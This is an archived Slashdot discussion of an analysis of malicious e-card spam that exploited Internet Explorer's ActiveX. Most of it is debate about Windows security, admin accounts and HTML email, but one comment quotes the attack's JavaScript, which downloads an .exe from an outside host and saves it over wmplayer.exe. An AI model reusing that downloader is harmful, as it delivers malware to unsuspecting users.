Malicious E-Cards - An Analysis of Spam

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."

I hate ecards

[jwthompson2]

This definitely could be a nasty little thing, thanks to poor security on remote executables. Wouldn't modification of default internet security settings go a long way to resolve this particular instance? Of course as a Mac user I don't have much to worry about with this.

Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

---
Mod me down, I'm already -1...woot!

Re:I hate ecards

[ONOIML8]

"Of course as a Mac user I don't have much to worry about with this."

Perhaps you should. Most windows users are somewhat prepared for things like this because it's become a matter of routine. (sick as that is).

But the average Mac or Linux user wouldn't know what hit 'em. It's good for us to stay alert, be cautious, worry a bit.

Re:I hate ecards

[jwthompson2]

I Agree. I have all my security settings turned to an appropriate level. With the exception of trusted sites, everyhting that happens requires my acceptance, so I am personally fairly safe, as far as I can be proactively. I can't say this with any certainty but other than IE do any other browsers allow installation of a remote file at all, let alone over top of an existing file? Plug-ins don't autoinstall on my Mac and javascript and Java run in a 'protected box' that limits their access to the system if I recall correctly. So this sort of thing really isn't an issue if all of that is as I believe.

Re:I hate ecards

[lightspawn]

Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

Our society is fed up with poverty, disease and famine, but there's nothing to be done about those either.

Microsoft is a huge, rich company. If they can't write secure software it can't be done, and anyway it's always the fault of the bad guys for doing bad stuff, never the fault of the company making it possible in the first place.

(note - it's not my opinion, but I did talk to Joe Sixpack a few days ago and he said everybody except us geeks agreed that was the case).

Frightening

[JackBuckley]

This is a fascinating bit of detective work that should serve as a reminder to all careless users (especially Windows ones) that *SPAM IS NOT BENIGN*. It's not just annoying ads for penile implants--it can be downright dangerous to your PC.

Re:Frightening

[Alizarin+Erythrosin]

Quite right. Not only can it be dangerous to your PC or bank account (if they install a key logger too, for example), but stuff like this steals your bandwidth, which some people in this world still pay for by amount, not a flat rate.

Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

Re:Frightening

[harmonica]

Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.

Re:Frightening

[darien]

I dunno about shift-click, but I just click the little wheel on my mouse on a link and Mozilla opens it in a new tab. Which I (personally) think is way friendlier...

Re:Frightening

[mkoenecke]

On Firefox 0.8, Shift-click certainly *does* open a new window, so I don't know what you are talking about. However, I've gotten so used to middle-click (open in new tab), which is quicker, that I had not checked before. Get Firefox instead.

Re:Frightening

[Cecil]

I still use IE because Mozilla doesn't SHIFT+Click with the same behavior (open in new window) as IE ... I won't even talk about that stupid dinosaur splash screen.

Wow, are you trolling or what? First of all, as of this writing, shift-clicking on a link in FireFox (formerly Firebird) does open it in a new window, although god knows why you'd want to do that when you can middle-click to open it in a tab in the background instead.

Secondly, the "stupid dinosaur splash screen" (which I loved) has been gone for about 4 release versions of Mozilla now, to be replaced with a hideously drab orange box with 'Mozilla' written in it. Now that we've compromised on an ugly splash screen, no one's happy. Hooray for attempting to pander to everyone!

Re:Frightening

[1u3hr]

I don't know how to increase someones phone bill by having them click a link.

Here's a whole page of dialers that do stuff like that. A bigger problem in Europe I've heard.

You might remember me

Hi. I'm Troy McClure. You might remember me from such e-mail how-to videos as "Nigeria: Your Path to Riches" and "Can I Lengthen my Penis 73 inches if I answer 22 emails?"

Re:You might remember me

[ggvaidya]

... "This time, I'm here to screw up your computer and install a virus! How about that? Let's get started ..."

Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?

Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?

Re:e-cards

[bad+enema]

Yes, but they do cost a person their time. Not very much, but I think it can be safely said that most e-cards are more fun to receive than normal greeting cards. And the quality of the e-card depends on how long the person has spent to pick it out.

AOL Falling behind?

[Faith_Healer]

Any one else notice that the mail is originaly from a compuserve address? I thought that the new AOL was suposed to be safe? =)

Re:AOL Falling behind?

[scambaiter]

It actually isnt. A lot of spam has forged headers to looke like its coming from compuserver.com, aol.com, hotmail.com or microsoft.com. Never seen any of the given IPs resolve to one of those domains though.

Re:e-cards

[jwthompson2]

Interesting take. I know my wife likes ecards because it is of course free which beats a card and stamp. She doesn't use them very often, except when she comes across a particularly funny or expressive one, and only when we forget to get a real card... :-)

---
Mod me down...I'm already -1....woot!

Spam in Outlook

[DoorFrame]

I was having a discussion with a friend the other day about Outlook email virii, and I quite frankly wasn't sure anymore. If a windows box is completely updated, is it possible for an email to be able to unload/execute a virus without a user openning an attachment or clicking on an off-email link? Any examples?

Re:Spam in Outlook

1. It's viruses. 2. Yes, if the exploit in question has not yet been patched.

Re:Spam in Outlook

[dave420-2]

The real problem isn't the technology, but the users. The same principle behind users opening unknown attachments also exhibits itself in the form of people deleting their windows directory.

Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.

Remember "security through obscurity"? Well, the reverse applies, too.

Re:Spam in Outlook

[77Punker]

As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if you're box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.

Re:Spam in Outlook

[Swanktastic]

As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if you're box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.

Of course, it could be pointed out that this is true for any piece of software.

It's sort of a truism-- if a cracker is aware of an exploit that the OSS community does not know about, then your linux/BSD box is not secure either.

I think the real answer to the Original Poster's question is "Probably not." It seems to me that 99% of viruses use public, well known exploits to compromise unpatched systems. It seem to be a much rarer occurance where some black hat out there discovers the exploit and crafts a successful worm/virus/whatever around it.

Re:Spam in Outlook

[MooCows]

This argument has been going on forever.
And, IMHO, is only partly correct.
Windows and it's apps have many "by design" security flaws.

Short list:
- Horrible data-binding in many apps (IE/Outlook/etc)
- Enabling scripts in emails to run in the local zone
- No warnings for insecure passwords
- NetBIOS open by default for the internet
- IIS, period
- Null sessions
- Password hashing flaw (l0pth)

Some of these are fixed, some are not.

Apache runs on the majority of servers, and it isn't by far hacked as much... just figure.

Re:Spam in Outlook

[Spoing]

I'll add;

- Using file name extentions to identify files and to choose what will process the contents those files
- Hiding those same extentions by default

These alone are a large part of the problem with Windows security.

The most frightening bit here

[Rope_a_Dope]

ActiveX actually lets a webpage rewrite your wmplayer.exe file with its own version. If an Activex control can rewrite any executable on a Windows box, then I assume that any piece of the Windows kernel is vulnerable. This leads to a larger question, which is, "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?".

Re:The most frightening bit here

[ggvaidya]

I think you have to be Administrator for the re-write to work. Then again, most of the people I know run as administrator, so ...

Re:The most frightening bit here

[bhtooefr]

There's Trend Micro's HouseCall, which is an ActiveX applet that runs virus scans. Actually, most diagnostic web sites have ActiveX. Also, PowerLeap's InSPECS system requires IE with ActiveX enabled.

Re:The most frightening bit here

[CdBee]

"Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

(MSN) Chatrooms and Windowsupdate spring to mind as web-based uses of ActivX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActivX chatrooms though, I've seen chatroom moderators recommending users to download Mozilla :-)

One extra worrying thing though, when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActivX control for the chatroom you have to install Microsoft ActivX Wrapper for Netscape

Potentially, Mozilla users are now affected by ActivX insecurities if they accept this download.

Re:The most frightening bit here

[FSWKU]

Actually, there are legitimate uses for ActiveX. One example being the Remote Desktop Web Client. It's a simple little ActiveX control that lets you log into your computer without having to install the terminal services client. While I would love to be able to get rid of that, it really isn't possible. The "engineer" where I work is a paranoid dolt who insists that no one should ever be allowed to install anything on any of the computers in the office (including popup killers...imagine the horror) and won't upgrade the machines (933mhz systems) to anything higher than Win98. Come to think of it, it's somewhat of a miracle that I can even remote into my system at all from there.

Re:The most frightening bit here

[lordDallan]

The better question is why does Windows XP Home only have two user types, a totally crippled limited user (i.e. sh*t doesn't work half the time - so nobody uses it) or a full power, overwrite anything, viruses-be-damned administrator.

Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.

If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.

Re:The most frightening bit here

[SlashDread]

Well if Rise Of Nations((C) MS) would just run WITHOUT being an admin, id switch to a normal user in a blink..

"/Dread"

Re:The most frightening bit here

[kinnell]

Is there anybody that actually uses ActiveX on a webpage

I'm forced to use IE at work with the "prompt before accepting activeX components" option turned on. You think pop-ups are bad, you should try this! It seems to be used for any kind of plugin (flash, etc), and most pages with adverts, even slashdot, contain activeX of some kind. It really highlights how dangerous IE is - even when you're prompted, you don't know what you're accepting - you could be trying to view a PDF file - and if you accept it you are compromising your system, even if it's just user files at risk. When you consider the number of people routinely running potentially dangerous activeX components without realising it just by surfing the internet...it's unbelievable.

Re:The most frightening bit here

> and not a happy compromise like Win 2K's "Power User"

Power User is pretty powerfull. I believe it can overwrite files in the Program Files folder, so is almost as dangerous as Administrator. I'm usually running as Restricted User on Win2K, the RunAs service works reasonably well for installing new software or tinkering in Computer Manager.

Re:The most frightening bit here

[Threni]

> Well if Rise Of Nations((C) MS) would just run WITHOUT being an admin, id switch
> to a normal user in a blink..

Can't you log on as a normal user and then do a `run as administrator` on it?

Re:The most frightening bit here

[jodio]

XP does have "power user"

Re:The most frightening bit here

[LostCluster]

ActiveX is not sandboxed at all like Java is. So, like any powerful tool, it can be used for both good and bad.

Windows Update depends on ActiveX to determine which updates a user already has. Many virus-scanning websites need to be able to read and (and when cleaning, write to) every file on the system, so they need ActiveX too.

When it comes down to it, ActiveX controls are just as powerful as any other executable, which is why the user is presented with a security certificate before they run. I think the critical flaw in ActiveX is right there at that dialog box, because the default answer is "Yes" and users don't read the whole thing to understand what it means.

Re:The most frightening bit here

[just+fiddling+around]

Another flaw: i get to check "always trust Hackerboy" box, but there is no "never trust Hackerboy" box for me to check. Would work wonders on my blood pressure...

Re:The most frightening bit here

[kisrael]

You know, that kind of assymetry shows up a few places in Windows, and it's always annoying.

Like, I think it's a File Replace dialog, "Yes" / "Yes to All" / "No" / "Cancel"

Why is there "No to All"? It's not quite as useful as "Yes to All", but you could easily think of some scenarios where you want to add in new files but don't want to try and overwrite any files that are already there...

Re:The most frightening bit here

[moonbender]

From the Windows Update FAQ (my markup):

What is an ActiveX control?
ActiveX Controls are reusable software components that incorporate ActiveX technology. These components can be used to add specialized functionality, such as animation or pop-up menus, to Web pages, programs, and software development tools. Windows Update uses ActiveX controls to check what software is installed on your computer in order to provide you with a correct list of updates and other software you may want to download.

Also, try disabling ActiveX in IE and running Windows Update - doesn't work. That's not to say it doesn't use VBScript in addition to ActiveX, of course.

Re:The most frightening bit here

[kisrael]

"No to all" would be redundant to "Cancel". Both would immediately stop the operation with no further questions.

No it wouldn't be redundant, different behaviors are impled, since it's not "No to ALL files I selected to copy", it's "no to all files with a name collision"

I'm thinking of copying a bunch of files (say, W, X, Y, and Z) into a directory that already has some files with the same name. (say, X and Z)

W copies fine.
X brings up that dialog:
"Yes"--copy X, copy Y, ask about Z
"Yes to all"--copy X, copy Y, copy Z
"No"--skip X, copy Y, ask about Z
"No to all"--skip X, copy Y, skip Z
"Cancel"--skip X, skip Y, skip Z

Now, this is obviously a trivial example, but if you have a large number of files, where you want all the files that were in the source directory but don't want any existing file in the destination directory changed, the assymetry in the dialog is annoying.

Re:The most frightening bit here

[misleb]

Windows Update depends on ActiveX to determine which updates a user already has.Many virus-scanning websites need to be able to read and (and when cleaning, write to) every file on the system, so they need ActiveX too.

Maybe it is time the world gave up on these mega-web-applications. Why can't Microsoft write a damn standalone Windows UPdate application that doesn't use a browser.... like Apple does on OS X? Why does everything need to be web based these days? Sandbox the damn ActiveX crap, restrict user privilges by default, tighten Explorer security settings BY DEFAULT, and ship a standalone app for everything that you can. If Microsoft wants to improve security, they are ultimately going to have to stand up to users and say, "You know what? We will only trade so much security for convenience. Deal with it."

-matthew

Re:The most frightening bit here

[badzilla]

I try and make my kids run using an account without Administrator rights on their games machine, unfortunately that is a complete nightmare. Every few minutes it's "Dad... I can't install Megablaster 2 Railgun Edition" or "Dad... Flopsy Bear Print Studio says access denied".

And this is after spending a great deal of time putting friendly NTFS permissions onto their "c:\games" directory. If only makers of entertainment software would clean up their act! Surely these things don't actually NEED to have root all over the place.

Re:e-cards

[toasted_calamari]

What really annoys me about e-cards is that even the legitimate ones look like spam, so much so that not only does the spam filter flag them, but I have trouble deciding if someone is being nice to me or trying to exploit my system.

With regards to the article, thats definitly one of the nastiest browser exploits i've seen in a long time, makes me glad I don't use windows and IE.

It'd be scary if I ran my PC as Administrator...

[gfecyk]

...and if I was stupid enough to actually install the crapware the strange website/email/stranger gave me.

Spylog is not spyware!

[tgma]

While I commend the original article as an interesting dissection of an attempted attack via spam, the heading is a little sensational. It mentions Russian spyware sites, but the site in question is Spylog.com, a reputable Russian monitoring site. Not everything on the Russian internet is malicious, and Spylog does some good work on reporting statistics about the Russian internet.

Just a minor correction.

Russian spyware.

[sorlov]

Once again /. offers excellent analysis. spylog.com is not spyware. It's site statistics. In fact the article author says spylog.com is used to gather statistics. Slashdot editors don't read the articles?

Re:Russian spyware.

[Chuck+Bucket]

you must be new here.

CB

A little bit unfair to Outlook

[DoorFrame]

This story is presented as an example of the bad things that can happen from opening spam in Outlook ("If you're still using Outlook and Internet Explorer, this is a good time to find alternatives"). But the story doesn't point to any actual isssue with Outlook, only exploits in Explorer that allow downloaded code to be executed remotely. The Outlook bashing seems out of place.

Re:A little bit unfair to Outlook

[GigsVT]

How do you think Outlook displays mail? Last I checked, it embeds the IE control.

Re:A little bit unfair to Outlook

[ncr53c8xx]

How do you think Outlook displays mail? Last I checked, it embeds the IE control.

It gets worse. Microsoft does not provide a standalone download to update IE. The only way to get the update is to run the stubb they provide which starts up IE as Administrator!! No wonder many machines get p0wn3d during patching.

At what point

[GigsVT]

Does this stuff get treated like a virus/trojan, rather than legitimate business?

If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.

It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).

People actually get pissed off when we tell them they can't have weatherbug on their computer.

Re:At what point

[Paisley+Phrog]

then it's OK for you to write viruses and trojans (like weatherbug).

From everything I've read, WeatherBug isn't a trojan...it's adware and will put banners on your desktop for the service it provides, but they're rather up-front about that.

Perhaps you mean WeatherCast?

Are there really better alternatives???

[TopShelf]

The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure, or is it just that black hats like this are going after the 90%+ out there using MS products due to the size of opportunity?

Not trolling, just asking an honest question here.

Re:Are there really better alternatives???

[aborchers]

The "alternative" clients typically do not do things like run scripts, overwrite files, etc without at least a confirmation from the user. The problem is that IE and Outlook are so feature rich, and so easily configured (historically by default) to gullibly trust any command that comes down the pipe, that they pose a severe risk to exactly the class of users (i.e. inexperienced or ignorant) that most frequently use them.

So, in effect, yes, there is an aspect to the other clients that is inherently more secure, but users savvy enough to obtain and use them could probably also configure and use most modern MS products fairly securely as well. It is a combination of user behavior and software design security.

For the record, I find it hard to believe that someone with a 5-digit /. ID could ask this question and not be trolling... ;-)

Re:Are there really better alternatives???

[jfengel]

Security through obscurity never works, but there is something to be said for security through diversity. It works because it lowers the "payoff" of writing worms, perhaps to the point where it's no longer worth the effort.

Without an exhaustive code analysis of Outlook I can't say for certain, but Outlook has a lot of code in it that dates back before malicious worms became a daily occurrence. Because of that, the code seems to have been written with other goals than security in mind.

I don't mean that to insult MS; it's only in the last five years or so that "absolutely MUST be secure" has been a real consideration for any vendor. Look at Windows 95's silly logon procedures. Before that, many features were added that were dangerous but, in Microsoft's opinion, useful. At least it made a spiffy demo to have systems administrators updating every desktop in the office just by sending email.

Firebird, etc. have been written in a rather more paranoid age. I'm certain that there are potentially disastrous bugs in it. In this case I have read the code, and I've found a lot of nice defensive programming, but that doesn't preclude mistakes that the authors, me, and a thousand others might all have missed.

Still, having be written for security from the ground up, with no silly code-executing features and strings all well protected from buffer overruns, I'm putting my faith in the ground-up rewrite that is Firebird/fox to Microsoft's apparently slapdash Outlook/IE combo.

Microsoft appears to be improving its code, not least because of the withering hail of worms thrown at it because it's the market leader and therefore has the biggest payoff. These days worms all seem to depend not on security holes but on user stupidity or user laziness. This particular article is pointing out a worm that propagates through well-known, and supposedly well-patched, techniques. But there are obviously people out there on whom it works.

Eventually, Microsoft will have to fix both user stupidity and user laziness in code. Eventually, any new program you receive is going to have to have a system administrator's explicit authorization to run or install itself for the first time. Even "sandboxed" environments like Java can't prevent a user from running an executable and doing at least limited damage. I suspect that someday, code will simply not be authorized to run at all without more than a mouse click between you and ruin.

Re:Are there really better alternatives???

[orthogonal]

The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?

Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.

No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!

Go to web-site, get a new OS!

And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop tho think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag?

To the contrary, they considered it a positive feature! Why? Because Visual Basic "programers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".

Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.

I mean, Christ. This is just a travesty, and open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, bit I never knew javascript could be so bad.

I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.

Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.

I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.

What the hell?

Re:It'd be scary if I ran my PC as Administrator..

[ggvaidya]

That's the point! There's no "crapware" - it's a simple file overwrite! If you're running as Admin..., you won't notice at all - your media player will just suddenly stop working.

Conclusions

[kyshtock]

I believe that there are at least 2 conclusions here:

1. Clicking can be dangerous.

2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, than it's time to change the security settings.

Don't run ActiveX as Administrator, simple.

[gfecyk]

Win98 is supposed to be gone, or no longer supported.

Assuming that, and that your WinLusers are running current versions of Windows with actual security, and they're running as regular users, a web page CAN'T overwrite anything because regular users don't have write permissions in %systemroot% or in Program Files.

Problem solved. Without a script blocker or any other third-party garbage.

Re:Don't run ActiveX as Administrator, simple.

[glenrm]

Huh, so what if you are running has admin, why would I want a web page to overwrite .exe files without asking permission? In the race to keep up with Java some very unsafe things were done with ActiveX...

Re:Don't run ActiveX as Administrator, simple.

[jdhutchins]

Most windows users end up running as admin. Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.

Re:Don't run ActiveX as Administrator, simple.

[dAzED1]

that simple? Really?

My wife had to use MS office for something, so I installed XP on one of my laptops for her. It wanted to add a user. I put her name in.

Gosh, whatya know...it made her an admin. Yeah, default behaviour. That's peachy. The problem is what the normal people will do.

for the normal user, the win98 lack of security has not changed in XP. Still there. And activeX is enabled by default as well.

Re:Don't run ActiveX as Administrator, simple.

[0123456]

Yep. Even for video editing I have to run as Administrator, and I really don't want to have to keep changing users in order to run different programs. I did try to set up a non-Administrator user for my GF to use on the same PC, but half the programs she wanted to run wouldn't work without Administrator priviledge, so I gave up.

"Security" in Windows is just broken, it's that simple.

Re:Don't run ActiveX as Administrator, simple.

[sqlrob]

Win98 is supposed to be gone, or no longer supported.

Not true. Support was extended two years.

Re:Don't run ActiveX as Administrator, simple.

[ncr53c8xx]

Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.

You don't need admin access unless you want to run some system utilities. The only time I had to login as admin was when I tried to run Sandra. I have found several programs that need Power User access to function properly though (RealJukebox etc). Since the Power Users group members can install software, this is somewhat undesirable.

Re:Don't run ActiveX as Administrator, simple.

[the_L0rax]

They're right, even if you know better than to have your regular account be an admin account MS pretty much forces you to operate that way. I have tried setting up seperate accounts and it just isn't practical. Way too many things require you to have admin priviledges, so you can either switch users every 3rd program or you just give up and use an admin account. Even right clicking and choosing "Rus As" rarely works right. Microsoft made a half-a**ed attempt at multi-user support just so they could say they had it.

Turn off HTML viewing in your email client!

[turnstyle]

I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!

It's an easy way to protect yourself from all sorts of stupid stuff.

Ahem, turn off HTML viewing in your email client NOW.

Re:Turn off HTML viewing in your email client!

[ackthpt]

I've been usuing The Bat (www.ritlabs.com) for about 5 years now, and it's great. No worms, no virii, no pop-ups, no crap. I view all my email as text. And they've been continuously improving the product.

Support shareware :-)

Re:Turn off HTML viewing in your email client!

But that's a cool feature!

What next? Should I stop using Outlook???

Re:Turn off HTML viewing in your email client!

[simp]

Switch off HTML formating for Outlook.

See http://support.microsoft.com/default.aspx?scid=kb; EN-US;307594 on how to do it.

Re:Turn off HTML viewing in your email client!

[Erik+Piper]

There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just words. I do tech support, and I'm THRILLED when the person on "the other end of the line" sends me an HTML e-mail, because it means I can use the features of HTML mail to provide him or her a clearer, more visible explanation, and if that person has a decent Internet connection, I can even ask them to paste screenshots into their e-mails instead of trying to guess which client they have and how pasting attachments in it works, and then explaining it to them and hoping they understand.

Erik

Re:Turn off HTML viewing in your email client!

[JPriest]

There is a client called pocomail that I use that is pretty safe. It has an intuitive spam filter, you can script it to do about anything with mail, and it has a simple filter setup for sending messages from X to folder Y.

spam filter:
"viagra", +9
"herbal", +6
"natural", +6
"to be removed", +5
"free", +2
"!!!", +2

You get the point. You can toggle things like loading external graphics etc. It is really a mail client for power users. Shareware, but one of the few programs I ever purchased.

Re:Turn off HTML viewing in your email client!

[pldms]

There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just word

Ok, but that doesn't require html; MIME can do this fine. In fact it's better since the image is part of the message,

Re:Turn off HTML viewing in your email client!

[RetroGeek]

features of HTML mail ... paste screenshots

And pasting a screen shot into a word processing document, then attaching that is not OK? Yes, a little more work, but the benefit is safer Internet use for the rest of us.

Email is Email. HTML is for Web pages. The marriage of the two (Thanks Bill!) makes SPAM more dangerous, lets the email sender track you (via 1x1 images), and makes email messages MUCH larger thereby wasting bandwidth.

Re:Turn off HTML viewing in your email client!

Switch off HTML formating for Outlook.

Hah. If that would be the only problem with Outlook.

Re:Turn off HTML viewing in your email client!

[misleb]

But in terms of real, non-technical end-users, HTML is what's out there.

The point is, attaching pictures to email has absolutely nothing to do with HTML. "Non-technical end-users" don't compose HTML that references pictures because it requires having a Web server to serve the pictures. All you are really going to get out of HTML in an email is varied fonts and colors. As neat as that might be, it is hardly enhanced communication. Nor is it worth the risks.

95% of the HTML email I get is spam. The other 5% is messages from mailing list subscriptions or Amazon or whatever. Most of those come with both plain text and HTML. If nothing else, most "nontechnical end-users" would do good to turn off HTML so they won't have to look at offensive porn spam with obscene images (not attachments).

-matthew

Re:Turn off HTML viewing in your email client!

[Endive4Ever]

The image being part of the message is supposed to be a good thing?

I never, ever, send mail in an HTML format. But I always send photographs and other stuff like that as urls (plaintext URLs, which most modern mail readers sense and interpret as web-links) to images I store on my webspace somewhere.

Why shuttle around bloated email attachments?

Re:Turn off HTML viewing in your email client!

What sucks is that Microsoft (thanks, Bill!) decided to use IE as the viewer for emailed HTML (specifically, it's the core part of IE that's being recycled in Outlook, effectively IE). So not only can an Outlook bug get you, you'll get double-dipped by any IE bugs that are out there. Lovely!

Re:Turn off HTML viewing in your email client!

[corbettw]

Clickety click.

Re:Turn off HTML viewing in your email client!

[Erik+Piper]

Ummm... because you're an ordinary mortal and don't have your own webspace somewhere, perhaps?

Because, in the case I case I was describing, tech support, having the image integrated into the message -- like saying "click [picture of button]" instead of "click the button that looks like Bugs Bunny on speed" or whatever is a lot more helpful?

A LOT of damn good reasons. It is indeed supposed to be a <i>good</i> thing.

Erik

Re:Turn off HTML viewing in your email client!

[misleb]

I never, ever, send mail in an HTML format. But I always send photographs and other stuff like that as urls (plaintext URLs, which most modern mail readers sense and interpret as web-links) to images I store on my webspace somewhere.

This isn't a realistic option for most people. Nor is it very convenient. Unless, of course, the image is part of an existing website.

Why shuttle around bloated email attachments?

It is not a big deal in most cases. Although this brings up an interesting point. There are cases when people want to send files (maybe an MP3 or movie) in excess of 5 megabytes. This is not appropriate for the current state of email (SMTP, et al). What do regular users do when then want to send someone a large file? They're not going to choke MY SMTP servers (with virus scanning) with their huge attachments.

-matthew

Re:Turn off HTML viewing in your email client!

[gnu-generation-one]

"I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!... It's an easy way to protect yourself from all sorts of stupid stuff... Ahem, turn off HTML viewing in your email client NOW.

I misread that as "turn off HTML viewing in your web browser NOW", and wondered why it wasn't marked as funny...

Well, it would make some things safer...

Re:Turn off HTML viewing in your email client!

[FooAtWFU]

I don't have HTML viewing available... I use Pine, you insensitive clod!!! ;)

Re:Turn off HTML viewing in your email client!

[EasyTarget]

I've been usuing The Bat (www.ritlabs.com) for about 5 years now, and it's great. No worms, no virii, no pop-ups, no crap. I view all my email as text. And they've been continuously improving the product.

Where to start.. I finally ditched the Bat! after my five years last week.. and good riddance.

The UI has not evolved, sure lots of new features get added over the years, but they all end up as hacks into an already clumsy interface.

The UI is a classic case of a few -really- good features (I do appreciate them) surrounded by poo. Auto-formating in the text is useless, NEVER paste some code and try to annotate it, turning it off leaves everything else looking ugly. Even Outlook manages to format it's messages better.

The UI displays a classic 'designed by the developers' illness. They can't see it's flaws because they're too embedded in the development. If they'd just employ a professional UI designer to re-jig it, and actually do the things suggested, then it would be a world-beater.

And you now have to upgrade ($$$) to the latest version to stay current. It's just the same as the old one, hardly any worthwhile new features. A money-spinning enforced upgrade of the most cynical sort.

If you want it's fantastic filtering systems, wonderful templates, clever widgets, superb PGP support etc.. and are prepared to put a lot of effort and patience into learning and using it, then I heartily recommend it.

If all you want to do is write emails to people, and read ones you receive, save yourself time and money by looking elsewhere.

Re:Turn off HTML viewing in your email client!

[Endive4Ever]

When they first put in Windows for Workgroups at the company I worked for at the time, they put one of the more annoying putzes in Engineering in charge of 'the mail server' which was a wobbly install of NT Advanced Server 3.1'.

I proceeded to mail my entire c:\dos directory as attachments to one of my buddies. It just seemed like the thing to do. Boy, that took down the mail server bad.

It really got the tech mad, but he was a third stringer doing make-work for the 'vanguard' engineer who thought it was such a good idea to roll out Windows For Workgroups (in direct conflict with the IT people who had other plans of afflicting us with Novell stuff,) and I was writing the embedded code that made the company's products run. It was overall a fun time.

Re:Turn off HTML viewing in your email client!

[b-baggins]

You're car's tires are defective: Drive no faster than 35 MPH anywhere and do it now. What? Change the tires? You're an idiot. Don't drive any faster than 35 MPH and you'll be perfectly safe. What do you mean that limits the power and flexibility of your vehicle? Do you want to be safe or not? Drive no faster than 35 MPH and do it now!

Stay on your toes

[J.+Jacques]

